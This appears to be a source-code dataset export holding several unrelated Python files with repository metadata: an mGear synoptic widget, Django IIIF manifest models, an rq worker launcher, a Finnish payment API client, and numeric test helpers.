| 36.5 | 111 | 0.622831 | 674 | 5,475 | 4.811573 | 0.186944 | 0.103608 | 0.067838 | 0.019735 | 0.226334 | 0.220783 | 0.220783 | 0.18378 | 0.18378 | 0.125193 | 0 | 0.002249 | 0.269224 | 5,475 | 149 | 112 | 36.744966 | 0.808298 | 0 | 0 | 0.146789 | 0 | 0 | 0.092985 | 0.010778 | 0 | 0 | 0 | 0 | 0 | 1 | 0.119266 | false | 0 | 0.027523 | 0.045872 | 0.238532 | 0.110092 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad6d03303dda7d87d8fea8240570c8e8ff1513e8 | 1,492 | py | Python | python/ymt_synoptics/ymt_secondary_default/__init__.py | yamahigashi/mgear_shifter_components | c4e4c19d8a972e4d78df46f4bdf0b3319da5a792 | [
"MIT"
] | 10 | 2020-01-24T10:10:39.000Z | 2021-09-16T06:20:55.000Z | python/ymt_synoptics/ymt_secondary_default/__init__.py | yamahigashi/mgear_shifter_components | c4e4c19d8a972e4d78df46f4bdf0b3319da5a792 | [
"MIT"
] | null | null | null | python/ymt_synoptics/ymt_secondary_default/__init__.py | yamahigashi/mgear_shifter_components | c4e4c19d8a972e4d78df46f4bdf0b3319da5a792 | [
"MIT"
] | 2 | 2020-01-24T10:11:07.000Z | 2020-04-21T18:17:09.000Z | from mgear.synoptic.tabs import MainSynopticTab
from mgear.vendor.Qt import QtWidgets, QtCore
import pymel.core as pm
from mgear.synoptic import utils
from . import widget
##################################################
# SYNOPTIC TAB WIDGET
##################################################
class SynopticTab(MainSynopticTab, widget.Ui_baker):
description = "Control_List"
name = "Control_List"
# ============================================
# INIT
def __init__(self, parent=None):
super(SynopticTab, self).__init__(self, parent)
def selAll_clicked(self):
# type: () -> None
model = utils.getModel(self)
modifiers = QtWidgets.QApplication.keyboardModifiers()
selAll(model, modifiers)
def selAll(model, modifiers):
"""Select all controlers
Args:
model (PyNode): Rig top node
"""
rig_models = [item for item in pm.ls(transforms=True)
if item.hasAttr("is_rig")]
controlers = utils.getControlers(model)
if modifiers == QtCore.Qt.ShiftModifier: # shift
pm.select(controlers, toggle=True)
elif modifiers == QtCore.Qt.ControlModifier: # shift
pm.select(cl=True)
rig_models = [item for item in pm.ls(transforms=True)
if item.hasAttr("is_rig")]
for model in rig_models:
controlers = utils.getControlers(model)
pm.select(controlers, toggle=True)
else:
pm.select(controlers)
| 28.150943 | 62 | 0.58445 | 156 | 1,492 | 5.480769 | 0.416667 | 0.037427 | 0.063158 | 0.037427 | 0.20117 | 0.135673 | 0.135673 | 0.135673 | 0.135673 | 0.135673 | 0 | 0 | 0.230563 | 1,492 | 52 | 63 | 28.692308 | 0.744774 | 0.107909 | 0 | 0.275862 | 0 | 0 | 0.029826 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.172414 | 0 | 0.37931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad6d9c7108efa1aec3b7a6ec53a9cb2bc438ba78 | 15,856 | py | Python | djiffy/models.py | Princeton-CDH/djiffy | 53968d280e7208c4bf92d58eee6511032cc7b1ae | [
"Apache-2.0"
] | 5 | 2017-10-17T11:30:58.000Z | 2020-04-26T15:55:52.000Z | djiffy/models.py | Princeton-CDH/djiffy | 53968d280e7208c4bf92d58eee6511032cc7b1ae | [
"Apache-2.0"
] | 6 | 2018-04-26T20:40:19.000Z | 2022-02-16T20:41:36.000Z | djiffy/models.py | Princeton-CDH/djiffy | 53968d280e7208c4bf92d58eee6511032cc7b1ae | [
"Apache-2.0"
] | 1 | 2022-02-16T17:32:16.000Z | 2022-02-16T17:32:16.000Z | from collections import OrderedDict
import json
import os.path
import urllib
from attrdict import AttrMap
from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils.html import format_html
from jsonfield import JSONField
from piffle import iiif
import rdflib
from rdflib.namespace import DC
import requests
def get_iiif_url(url):
'''Wrapper around :meth:`requests.get` to support conditionally
adding an auth token based on the domain of the request url and
any **AUTH_TOKENS** configured in django settings.'''
request_options = {}
AUTH_TOKENS = getattr(settings, 'DJIFFY_AUTH_TOKENS', None)
if AUTH_TOKENS:
domain = urllib.parse.urlparse(url).netloc
if domain in AUTH_TOKENS:
request_options['params'] = {'auth_token': AUTH_TOKENS[domain]}
return requests.get(url, **request_options)
class IIIFException(Exception):
'''Custom exception for IIIF/djiffy specific errors'''
pass
class Manifest(models.Model):
'''Minimal db model representation of an IIIF presentation manifest'''
#: label
label = models.TextField()
#: short id extracted from URI
short_id = models.CharField(max_length=255, unique=True)
#: URI
uri = models.URLField()
#: iiif presentation metadata for display
metadata = JSONField(load_kwargs={'object_pairs_hook': OrderedDict})
#: date local manifest cache was created
created = models.DateField(auto_now_add=True)
#: date local manifest cache was last modified
last_modified = models.DateField(auto_now=True)
#: extra data provided via a 'seeAlso' reference
extra_data = JSONField(load_kwargs={'object_pairs_hook': OrderedDict},
default=OrderedDict)
class Meta:
verbose_name = 'IIIF Manifest'
# add custom permissions; change and delete provided by django
permissions = (
('view_canvas', 'Can view %s' % verbose_name),
)
# todo: metadata? thumbnail references
# - should we cache the actual manifest file?
# TODO: thumbnail doesn't have to be a IIIF image! Support thumbnail url?
def __str__(self):
return self.label or self.short_id
@property
def thumbnail(self):
'''thumbnail url for associated canvas'''
return self.canvases.filter(thumbnail=True).first()
def get_absolute_url(self):
''''url for this manifest within the django site'''
return reverse('djiffy:manifest', args=[self.short_id])
def admin_thumbnail(self):
'''thumbnail for convenience display in admin interface'''
if self.thumbnail:
return self.thumbnail.admin_thumbnail()
admin_thumbnail.short_description = 'Thumbnail'
@property
def logo(self):
'''manifest logo, if there is one'''
return self.extra_data.get('logo', None)
@property
def license(self):
'''manifest license, if there is one'''
return self.extra_data.get('license', None)
@property
def rights_statement_id(self):
'''short id for rightstatement.org license'''
if self.license and 'rightsstatements.org' in self.license:
return self.license.rstrip(' /').split('/')[-2]
_rights_graph = None
def license_label(self, lang='en'):
'''Get the text label for the rights license. Uses local
value from edm rights if available; otherwise uses
data for the URI to get the preferred label or title.'''
# Some manifests have a seeAlso data contains an "edm_rights"
# section with a label for the rights statement.
# Use that if available (NOTE: ignores specified language)
# NOTE: possibly PUL specific, but shouldn't hurt to look locally first
for data in self.extra_data.values():
if 'edm_rights' in data and 'pref_label' in data['edm_rights']:
return data['edm_rights']['pref_label']
# if license/rights label is not available locally, get via uri
if self._rights_graph is None:
# if license is defined and a url
if self.license and urllib.parse.urlparse(self.license).scheme in ['http', 'https']:
self._rights_graph = rdflib.Graph()
try:
# rights statement org does content-negotiation for json-jd,
# but rdflib doesn't handle that automatically
if 'rightsstatements.org' in self.license:
resp = requests.get(self.license,
headers={'Accept': 'application/json'},
allow_redirects=False)
if resp.status_code == requests.codes.see_other:
self._rights_graph.parse(resp.headers['location'], format='json-ld')
# creative commons doesn't support content negotiation,
# but you can add rdf to the end of the url
elif 'creativecommons.org' in self.license:
rdf_uri = '/'.join([self.license.rstrip('/'), 'rdf'])
self._rights_graph.parse(rdf_uri)
except Exception:
# possible to get an exception when parsing the
# rdf, maybe on the request; don't choke if we do!
# NOTE: using generic Exception here becuase unfortunately
# that is what rdflib raises when it can't parse RDF
pass
# get the preferred label for this license in the requested language;
# returns a list of label, value; use the first value
if self._rights_graph:
license_uri = rdflib.URIRef(self.license)
preflabel = self._rights_graph.preferredLabel(license_uri,
lang=lang)
if preflabel:
# convert rdflib Literal to string
return str(preflabel[0][1])
# otherwise, get dc title
# iterate over all titles and return one with a matching language code
for title in self._rights_graph.objects(subject=license_uri, predicate=DC.title):
if title.language == lang:
return str(title)
class IIIFImage(iiif.IIIFImageClient):
'''Subclass of :class:`piffle.iiif.IIIFImageClient`, for generating
IIIF Image URIs for manifest canvas images.'''
#: long edge size for single page display
single_page_size = 1000
#: long edge size for thumbnail
thumbnail_size = 300
#: long edge size for mini thumbnail
mini_thumbnail_size = 100
thumbnail_format = getattr(settings, 'DJIFFY_THUMBNAIL_FORMAT', 'png')
def thumbnail(self):
'''thumbnail'''
return self.size(height=self.thumbnail_size, width=self.thumbnail_size,
exact=True).format(self.thumbnail_format)
def mini_thumbnail(self):
'''mini thumbnail'''
return self.size(height=self.mini_thumbnail_size,
width=self.mini_thumbnail_size, exact=True) \
.format(self.thumbnail_format)
def page_size(self):
'''page size for display: :attr:`SINGLE_PAGE_SIZE` on the long edge'''
return self.size(height=self.single_page_size,
width=self.single_page_size, exact=True)
class Canvas(models.Model):
'''Minimal db model representation of a canvas from an IIIF manifest'''
#: label
label = models.TextField()
#: short id extracted from URI
short_id = models.CharField(max_length=255)
#: URI
uri = models.URLField()
#: URL of IIIF image for this canvas
iiif_image_id = models.URLField()
#: :class:`Manifest` this canvas vbelongs to
manifest = models.ForeignKey(Manifest, related_name='canvases',
on_delete=models.CASCADE)
#: boolean flag to indicate if this canvas should be used as thumbnail
thumbnail = models.BooleanField(default=False)
#: order of this canvas within associated manifest primary sequence
order = models.PositiveIntegerField()
# (for now only stores a single sequence, so just store order on the page)
# format? size? (ocr text eventually?)
#: extra data not otherwise given its own field, serialized as json
extra_data = JSONField(load_kwargs={'object_pairs_hook': OrderedDict},
default=OrderedDict)
class Meta:
ordering = ["manifest", "order"]
verbose_name = 'IIIF Canvas'
verbose_name_plural = 'IIIF Canvases'
unique_together = ("short_id", "manifest")
# add custom permissions; change and delete provided by django
permissions = (
('view_manifest', 'Can view %s' % verbose_name),
)
def __str__(self):
return '%s %d (%s)%s' % (self.manifest, self.order + 1, self.label,
'*' if self.thumbnail else '')
@property
def image(self):
'''Associated IIIF image for this canvas as :class:`IIIFImage`'''
# NOTE: piffle iiif image wants service & id split out.
# Should update to handle iiif image ids as provided in manifests
# for now, split into service and image id. (is this reliable?)
return IIIFImage(*self.iiif_image_id.rsplit('/', 1))
@property
def plain_text_url(self):
'''Return plain text url for a canvas if one exists'''
rendering = self.extra_data.get('rendering', None)
if rendering:
# handle both cases where this is a list and where it is just
# a dictionary, to be safe
if isinstance(rendering, list):
for item in rendering:
# iterate over the list and return the first plain text url
# we find
if 'format' in item and item['format'] == 'text/plain':
return item['@id']
else:
# otherwise, if it's a dictionary, check if it's plaintext and
# return
if 'format' in rendering \
and rendering['format'] == 'text/plain':
return rendering['@id']
# finally return None if no plain text is available or no rendering
return None
@property
def width(self):
return self.extra_data.get('width', None)
@property
def height(self):
return self.extra_data.get('height', None)
def get_absolute_url(self):
''''url for this canvas within the django site'''
return reverse('djiffy:canvas', args=[self.manifest.short_id, self.short_id])
def next(self):
'''Next canvas after this one in sequence (within manifest
primary sequence). Returns an empty queryset if there is no next
canvas.'''
return Canvas.objects.filter(manifest=self.manifest, order__gt=self.order) \
.first()
def prev(self):
'''Previous canvas before this one in sequence
(within manifest primary sequence). Returns an empty queryset
if there is no next canvas.'''
return Canvas.objects.filter(manifest=self.manifest, order__lt=self.order) \
.last()
def admin_thumbnail(self):
'''thumbnail for convenience display in admin interface'''
return format_html('<img src="{}" />', self.image.mini_thumbnail())
admin_thumbnail.short_description = 'Thumbnail'
class IIIFPresentation(AttrMap):
''':class:`attrdict.AttrMap` subclass for read access to IIIF Presentation
content'''
# TODO: document sample use, e.g. @ fields
at_fields = ['type', 'id', 'context']
@classmethod
def from_file(cls, path):
'''Iniitialize :class:`IIIFPresentation` from a file.'''
with open(path) as manifest:
data = json.loads(manifest.read())
return cls(data)
@classmethod
def from_url(cls, uri):
'''Iniitialize :class:`IIIFPresentation` from a URL.
:raises: :class:`IIIFException` if URL is not retrieved successfully,
if the response is not JSON content, or if the JSON cannot be parsed.
'''
response = get_iiif_url(uri)
if response.status_code == requests.codes.ok:
try:
return cls(response.json())
except json.decoder.JSONDecodeError as err:
# if json fails, two possibilities:
# - we didn't actually get json (e.g. redirect for auth)
if 'application/json' not in response.headers['content-type']:
raise IIIFException('No JSON found at %s' % uri)
# - there is something wrong with the json
raise IIIFException('Error parsing JSON for %s: %s' %
(uri, err))
raise IIIFException('Error retrieving manifest at %s: %s %s' %
(uri, response.status_code, response.reason))
@classmethod
def is_url(cls, url):
'''Utility method to check if a path is a url or file'''
return urllib.parse.urlparse(url).scheme != ""
@classmethod
def from_file_or_url(cls, path):
'''Iniitialize :class:`IIIFPresentation` from a file or a url.'''
if os.path.isfile(path):
return cls.from_file(path)
elif cls.is_url(path):
return cls.from_url(path)
else:
raise IIIFException('File not found: %s' % path)
@classmethod
def short_id(cls, uri):
'''Generate a short id from full manifest/canvas uri identifiers
for use in local urls. Logic is based on the recommended
url pattern from the IIIF Presentation 2.0 specification.'''
# shortening should work reliably for uris that follow
# recommended url patterns from the spec
# http://iiif.io/api/presentation/2.0/#a-summary-of-recommended-uri-patterns
# manifest: {scheme}://{host}/{prefix}/{identifier}/manifest
# canvas: {scheme}://{host}/{prefix}/{identifier}/canvas/{name}
# remove trailing /manifest at the end of the url, if present
if uri.endswith('/manifest'):
uri = uri[:-len('/manifest')]
# split on slashes and return the last portion
return uri.split('/')[-1]
def __getattr__(self, key):
"""
Access an item as an attribute.
"""
# override getattr to allow use of keys with leading @,
# which are otherwise not detected as present and not valid
at_key = self._handle_at_keys(key)
if key not in self or \
(key not in self.at_fields and at_key not in self) or \
not self._valid_name(key):
raise AttributeError(
"'{cls}' instance has no attribute '{name}'".format(
cls=self.__class__.__name__, name=key
)
)
return self._build(self[key])
def _handle_at_keys(self, key):
if key in self.at_fields:
key = '@%s' % key
return key
def __getitem__(self, key):
"""
Access a value associated with a key.
"""
return self._mapping[self._handle_at_keys(key)]
def __setitem__(self, key, value):
"""
Add a key-value pair to the instance.
"""
self._mapping[self._handle_at_keys(key)] = value
def __delitem__(self, key):
"""
Delete a key-value pair
"""
del self._mapping[self._handle_at_keys(key)]
@property
def first_label(self):
# label can be a string or list of strings
if isinstance(self.label, str):
return self.label
else:
return self.label[0]
| 38.579075 | 96 | 0.614531 | 1,934 | 15,856 | 4.930714 | 0.226474 | 0.01573 | 0.011011 | 0.008389 | 0.216758 | 0.181942 | 0.159501 | 0.128775 | 0.112206 | 0.094589 | 0 | 0.002409 | 0.293264 | 15,856 | 410 | 97 | 38.673171 | 0.848563 | 0.337916 | 0 | 0.19457 | 0 | 0 | 0.075468 | 0.002278 | 0 | 0 | 0 | 0.004878 | 0 | 1 | 0.144796 | false | 0.00905 | 0.063348 | 0.0181 | 0.497738 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad6f069ab18356a02f0885df946a9c125198a426 | 440 | py | Python | xcessiv/scripts/runworker.py | KhaledTo/xcessiv | a48dff7d370c84eb5c243bde87164c1f5fd096d5 | [
"Apache-2.0"
] | 1,362 | 2017-05-23T15:02:18.000Z | 2022-03-28T22:42:21.000Z | xcessiv/scripts/runworker.py | KhaledTo/xcessiv | a48dff7d370c84eb5c243bde87164c1f5fd096d5 | [
"Apache-2.0"
] | 40 | 2017-05-23T17:59:05.000Z | 2019-07-03T13:08:14.000Z | xcessiv/scripts/runworker.py | KhaledTo/xcessiv | a48dff7d370c84eb5c243bde87164c1f5fd096d5 | [
"Apache-2.0"
] | 123 | 2017-05-24T05:49:34.000Z | 2022-02-06T17:54:32.000Z | from rq import Connection, Worker
from redis import Redis
def runworker(app):
REDIS_HOST = app.config['REDIS_HOST']
REDIS_PORT = app.config['REDIS_PORT']
REDIS_DB = app.config['REDIS_DB']
QUEUES = app.config['QUEUES']
redis_conn = Connection(Redis(REDIS_HOST,
REDIS_PORT,
REDIS_DB))
with redis_conn:
w = Worker(QUEUES)
w.work()
| 24.444444 | 45 | 0.572727 | 52 | 440 | 4.634615 | 0.346154 | 0.149378 | 0.174274 | 0.149378 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.331818 | 440 | 17 | 46 | 25.882353 | 0.819728 | 0 | 0 | 0 | 0 | 0 | 0.077273 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad70f5d5b8addfdc17a654b487758488e6718ac5 | 13,561 | py | Python | verkkomaksut/__init__.py | fastmonkeys/python-verkkomaksut | 93b549f60a4488c5ce91849c7a2a46e55c770115 | [
"BSD-3-Clause"
] | 1 | 2016-11-08T07:30:12.000Z | 2016-11-08T07:30:12.000Z | verkkomaksut/__init__.py | fastmonkeys/python-verkkomaksut | 93b549f60a4488c5ce91849c7a2a46e55c770115 | [
"BSD-3-Clause"
] | null | null | null | verkkomaksut/__init__.py | fastmonkeys/python-verkkomaksut | 93b549f60a4488c5ce91849c7a2a46e55c770115 | [
"BSD-3-Clause"
] | 1 | 2018-04-04T10:00:32.000Z | 2018-04-04T10:00:32.000Z | # -*- coding: utf-8 -*-
"""
verkkomaksut
~~~~~~~~~~~~
Python wrapper for the JSON API of Suomen Verkkomaksut.
:copyright: (c) 2013 by Janne Vanhala.
:license: BSD, see LICENSE for more details.
"""
__version__ = '0.2.0'
import hashlib
import json
import requests
class VerkkomaksutException(Exception):
"""This exception is raised when the request made to the Verkkomaksut API
is invalid, or some other error occurs in the usage of the API."""
def __init__(self, code, message):
#: Error code is a unique string identifying the error. Possible error
#: codes are listed in the `documentation`_ of Suomen Verkkomaksut
#: REST API .
#:
#: .. _documentation: http://docs.verkkomaksut.fi/en/ch03s03.html
self.code = code
#: An error description of the error in chosen localization. This error
#: description is not meant to be displayed to the end-user.
self.message = message
class Contact(object):
"""This class represents the payer of a payment."""
def __init__(self, first_name, last_name, email, street, postal_code,
postal_office, country, telephone=None, mobile=None,
company_name=None):
#: Payer's first name.
self.first_name = first_name
#: Payer's surname.
self.last_name = last_name
#: Payer's email address.
self.email = email
#: Company name.
self.company_name = company_name
#: Payer's telephone number.
self.telephone = telephone
#: Payer's mobile number.
self.mobile = mobile
#: Payer's street address.
self.street = street
#: Payer's postal code.
self.postal_code = postal_code
#: Payer's post office.
self.postal_office = postal_office
#: Payer's country. The data are sent as a two-numbered character
#: string in ISO-3166-1 standard format. For example, Finnish is FI
#: and Swedish SE. The data are used for verifying credit history,
#: and is thus required.
self.country = country
@property
def json(self):
"""JSON representation of this contact."""
return {
'telephone': self.telephone,
'mobile': self.mobile,
'email': self.email,
'firstName': self.first_name,
'lastName': self.last_name,
'companyName': self.company_name,
'address': {
'street': self.street,
'postalCode': self.postal_code,
'postalOffice': self.postal_office,
'country': self.country
}
}
class Payment(object):
def __init__(self, order_number, contact, success_url, failure_url,
notification_url, **options):
#: Order number is a string of characters identifying the customer's
#: purchase and the used webshop software creates it.
self.order_number = order_number
#: Reference number is sent to bank by default and is automatically
#: created. In those payment methods that are used as an interface,
#: this field can contain own reference number, which is sent to the
#: bank service instead of the automatically generated reference
#: number.
self.reference_number = options.get('reference_number')
#: Any data about the order in text format can be sent to the payment
#: system. The most usual pieces of data are customer name and contact
#: information and order product information. They are shown in the
#: Merchant's Panel in payment details.
self.description = options.get('description')
#: Payment currency. Value must EUR for the Finnish banks, otherwise
#: the payment will not be accepted.
self.currency = options.get('currency', 'EUR')
#: Localisation defines default language for the payment method
#: selection page and presentation format for the sums. Available
#: localisations are "fi_FI", "sv_SE" and "en_US". The default
#: localisation is always "fi_FI".
self.locale = options.get('locale', 'fi_FI')
#: A flag indicating whether the product row prices include value
#: added tax. If `True` VAT is included in the shown price; otherwise
#: it will be added. Therefore, set this to `True`, if the prices in
#: your webshop include value added tax, and `False` if the prices do
#: not include value added tax.
self.include_vat = options.get('include_vat', True)
self.contact = contact
#: A list of products. There must be at least one product, and the
#: maximum number of products is 500.
self.products = []
#: URL to which user is directed after a successful payment.
self.success_url = success_url
#: URL to which user is directed after a cancelled or failed payment.
self.failure_url = failure_url
#: URL to which user is directed, if the payment is pending. The
#: status is with NetPosti payment method. After the actual payment,
#: the payment is signed for receipt with notify request.
self.pending_url = options.get('pending_url')
#: URL requested when the payment is marked as successful. The URL is
#: requested with the same GET parameters as success address when the
#: payment is made. Notification request is typically executed within
#: a few minutes from the payment.
self.notification_url = notification_url
@property
def currency(self):
return self._currency
@currency.setter
def currency(self, value):
if value != 'EUR':
raise ValueError("Currently EUR is the only supported currency.")
self._currency = value
@property
def locale(self):
return self._locale
@locale.setter
def locale(self, value):
if value not in ('fi_FI', 'sv_SE', 'en_US'):
raise ValueError("Given locale is not supported: %r" % value)
self._locale = value
@property
def json(self):
return {
'orderNumber': self.order_number,
'referenceNumber': self.reference_number,
'description': self.description,
'currency': self.currency,
'locale': self.locale,
'urlSet': {
'success': self.success_url,
'failure': self.failure_url,
'pending': self.pending_url,
'notification': self.notification_url
},
'orderDetails': {
'includeVat': '1' if self.include_vat else '0',
'contact': self.contact.json,
'products': [product.json for product in self.products]
}
}
class Product(object):
TYPE_NORMAL = 1
TYPE_POSTAGE = 2
TYPE_PROCESSING = 3
def __init__(self, title, price, vat, amount=1, code=None, discount=0, type=TYPE_NORMAL):
#: Product name in free format. The product title is shown in the
#: Merchant's Panel and on Klarna service invoices on a product row.
#: Product details are shown also on the payment method selection page.
self.title = title
#: Optional product number. Using a product number may help in
#: aligning a correct product.
self.code = code
#: If an order consists of several samples of the same product, you
#: can enter the number of products here and there won't be a need for
#: adding each product as a separate row. Usually this field contains
#: value 1.
self.amount = amount
#: Price for one product. If the field payment includes VAT, this is
#: a price excluding VAT. Otherwise, this is a price including VAT.
#: The price can also be negative if you want to add discounts to the
#: service. However, the total amount of the product rows must always
#: be bigger than 0.
self.price = price
#: Tax percentage for a product. The value added tax in Finland for
#: most products is 23.
self.vat = vat
#: If you have reduced the product price, you can show the discount
#: percentage as a figure between 0 and 100 in this field. Default
#: discount value is 0.
self.discount = discount
#: A type can be specified for the product row. `Product.TYPE_NORMAL`
#: refers to a normal product row. `Product.TYPE_POSTAGE` can be used
#: for postage and `Product.TYPE_PROCESSING` for processing costs.
#: `Product.TYPE_NORMAL` can be used for all rows, but postage and
#: processing costs cannot be differentiated from other rows to the
#: invoice. Default value for the field is `Product.TYPE_NORMAL`.
self.type = type
@property
def type(self):
return self._type
@type.setter
def type(self, value):
if value not in (
Product.TYPE_NORMAL,
Product.TYPE_POSTAGE,
Product.TYPE_PROCESSING
):
raise ValueError('Given product type not supported: %r' % value)
self._type = value
@property
def json(self):
return {
'title': self.title,
'code': self.code,
'amount': self.amount,
'price': self.price,
'vat': self.vat,
'discount': self.discount,
'type': self.type
}
class Client(object):
SERVICE_URL = "https://payment.verkkomaksut.fi/api-payment/create"
def __init__(self, merchant_id='13466',
merchant_secret='6pKF4jkv97zmqBJ3ZL8gUw5DfT2NMQ'):
"""
Initialize the client with your own merchant id and merchant secret.
:param merchant_id: Mercant ID is given to you by Suomen Verkkomaksut
when you make the contract. Default is the test merchant account.
:param merchant_secret: Merchant secret is given to you by Suoment
Verkkomaksut. Default is the test merchant account.
"""
self.merchant_id = merchant_id
self.merchant_secret = merchant_secret
self.session = requests.Session()
self.session.auth = (merchant_id, merchant_secret)
self.session.headers = {
'Accept': 'application/json',
'Content-Type': 'application/json',
'X-Verkkomaksut-Api-Version': '1'
}
def create_payment(self, payment):
"""Creates a new payment and returns a `dict` with the following data:
`orderNumber`
:param payment: a `Payment` object
"""
response = self.session.post(self.SERVICE_URL,
data=json.dumps(payment.json)
)
if response.status_code != requests.codes.created:
data = json.loads(response.content)
raise VerkkomaksutException(
code=data['errorCode'],
message=data['errorMessage']
)
data = json.loads(response.content)
return {
'order_number': data['orderNumber'],
'token': data['token'],
'url': data['url']
}
def _calculate_payment_receipt_hash(self, *params):
base = '|'.join(params + (self.merchant_secret,))
return hashlib.md5(base).hexdigest().upper()
def _validate_payment_receipt_parameters(self, authcode, *params):
hash_ = self._calculate_payment_receipt_hash(*params)
return authcode == hash_
def validate_successful_payment(self, authcode, order_number, timestamp,
paid, method):
"""
Validates parameters sent by Suomen Verkkomaksut to the success URL or
pending URL after a successful payment. The parameters must be validated
in order to avoid hacking attempts to confirm payment. Returns `True`
when the parameters are valid, and `False` otherwise.
:param authcode: A hash value calculated by payment system.
:param order_number: The same order number that was previously sent to
the payment system. Order number uniquely identifies each payment.
:param timestamp: A Unix timestamp produced by Suomen Verkkomaksut used
for calculating the hash.
:param paid: A 10-character payment code, which is part of payment
confirmation. In case of a pending payment, this parameter is
always "0000000000".
:param method: The payment method used.
"""
return self._validate_payment_receipt_parameters(
authcode, order_number, timestamp, paid, method
)
def validate_failed_payment(self, authcode, order_number, timestamp):
"""
Validates parameters sent by Suomen Verkkomaksut to the failure URL
after a cancelled or failed payment.
:param authcode: A hash value calculated by payment system.
:param order_number: The same order number that was previously sent to
the payment system. Order number uniquely identifies each payment.
:param timestamp: A Unix timestamp produced by Suomen Verkkomaksut used
for calculating the hash.
"""
return self._validate_payment_receipt_parameters(
authcode, order_number, timestamp
)
| 37.774373 | 93 | 0.621709 | 1,632 | 13,561 | 5.077206 | 0.23652 | 0.021241 | 0.006638 | 0.013517 | 0.166787 | 0.141685 | 0.097755 | 0.094135 | 0.075308 | 0.075308 | 0 | 0.006629 | 0.299167 | 13,561 | 358 | 94 | 37.879888 | 0.865215 | 0.453506 | 0 | 0.113095 | 0 | 0 | 0.097718 | 0.007989 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113095 | false | 0 | 0.017857 | 0.029762 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad734e724495c3380fd814bc64d0a91e00a38b80 | 1,231 | py | Python | hfta/ops/utils.py | UofT-EcoSystem/hfta | 3ecde20363570b65f4f9656ff3204fe31f2ddcc0 | [
"MIT"
] | 24 | 2021-04-06T20:36:10.000Z | 2022-02-26T17:03:33.000Z | hfta/ops/utils.py | UofT-EcoSystem/hfta | 3ecde20363570b65f4f9656ff3204fe31f2ddcc0 | [
"MIT"
] | 20 | 2021-04-02T00:51:34.000Z | 2022-03-29T15:00:08.000Z | hfta/ops/utils.py | UofT-EcoSystem/hfta | 3ecde20363570b65f4f9656ff3204fe31f2ddcc0 | [
"MIT"
] | 5 | 2021-04-11T20:07:32.000Z | 2021-06-14T06:41:05.000Z | import torch
import numpy as np
import re
RE_PARSE_RATIO = re.compile('Mismatched elements: (\d+) \/ (\d+)')
def testcase_automator(testcase, configs):
print('Running testcase: {} ...'.format(testcase.__name__))
for name, vals in configs.items():
print('\tTesting along {} ...'.format(name))
for val in vals:
print('\t\tTry {}={}'.format(name, val))
kwargs = {name: val}
testcase(**kwargs)
def dump_error_msg(e):
""" Dump out the exception e message """
print('\t\t-> Failed with error message:')
print('[Start] ==============================================')
print(e)
print('[ End ] ==============================================\n')
def assert_allclose(
actual,
desired,
rtol=1e-07,
atol=0,
equal_nan=True,
err_msg='',
verbose=True,
population_threshold=0.0,
):
try:
np.testing.assert_allclose(
actual,
desired,
rtol=rtol,
atol=atol,
equal_nan=equal_nan,
err_msg=err_msg,
verbose=verbose,
)
except AssertionError as e:
m = RE_PARSE_RATIO.search(str(e))
if not m:
raise e
else:
if (int(m.group(1)) / int(m.group(2))) >= population_threshold:
raise e
| 23.226415 | 69 | 0.552396 | 151 | 1,231 | 4.364238 | 0.490066 | 0.036419 | 0.036419 | 0.081942 | 0.094082 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008466 | 0.232331 | 1,231 | 52 | 70 | 23.673077 | 0.688889 | 0.025995 | 0 | 0.136364 | 0 | 0 | 0.198992 | 0.078925 | 0 | 0 | 0 | 0 | 0.068182 | 1 | 0.068182 | false | 0 | 0.068182 | 0 | 0.136364 | 0.159091 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad74d62eb759429eb09905a06a2ab7aa0bb16a69 | 4,086 | py | Python | Simulation/data_simulation_base.py | reylined/TransformerJM | 1f551dd4f00c0b9c73bc93bf6f87450d4392fe34 | [
"MIT"
] | null | null | null | Simulation/data_simulation_base.py | reylined/TransformerJM | 1f551dd4f00c0b9c73bc93bf6f87450d4392fe34 | [
"MIT"
] | null | null | null | Simulation/data_simulation_base.py | reylined/TransformerJM | 1f551dd4f00c0b9c73bc93bf6f87450d4392fe34 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import scipy.integrate as integrate
import scipy.optimize as optimize
